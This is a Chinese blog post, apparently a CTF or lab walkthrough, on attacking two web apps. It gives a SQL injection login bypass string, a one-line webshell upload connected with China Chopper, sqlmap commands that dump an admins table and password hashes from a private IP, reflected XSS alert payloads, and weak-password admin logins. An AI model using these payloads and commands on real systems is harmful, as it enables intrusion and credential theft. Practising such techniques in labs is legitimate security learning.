前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次漏洞挖掘

记一次漏洞挖掘

作者头像
小简
发布2022-12-29 08:32:00
4800
发布2022-12-29 08:32:00
举报
文章被收录于专栏:简言之

题目一:PHP网页

0x01 SQl注入

OWASP扫描,爆出sql注入漏洞

利用爆出的万能钥匙(ZAP' OR '1'='1' -- )进行登录

登录成功

0x02 文件上传

第一步登录成功后,发现疑似上传点

直接上传一句话木马

上传成功

菜刀连接

getshell,就可以干坏事拉

0x03 SQL注入

在登录界面查询处发现疑似sql注入处

抓包发现变量名

sqlmap一键注入

1.查询数据库 python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dbs

2.查询grade数据库中表名 python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --tables -D grade

3.查询grade库中admins表中的字段 python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --columns -T admins -D grade

4.查询grade库中admins表中的字段id,name,pass python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dump -C "id,name,pass" -T admins -D grade

5.爆破phpmyadmin后台密码 python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --users --password

直接登录后台 账号:root 密码:123456

登录成功

0X04 XSS

反射型Xss <全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。>

OWASP ZAP扫描发现XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹框

题目二:JS网页

0x01 后台

百度搜索JSPGOU框架得到后台地址

访问后台地址

尝试弱口令登录 账号:admin 密码:123456

登录成功

0x02 XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹窗

0x03 文件上传

在后台发现上传点,可直接上传文件

参考: http://www.dengtar.com/5148.html https://www.codercto.com/a/63186.html

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-07-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 题目一:PHP网页
  • 0x01 SQl注入
  • 0x02 文件上传
  • 0x03 SQL注入
  • 0X04 XSS
  • 题目二:JS网页
  • 0x01 后台
  • 0x02 XSS
  • 0x03 文件上传
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档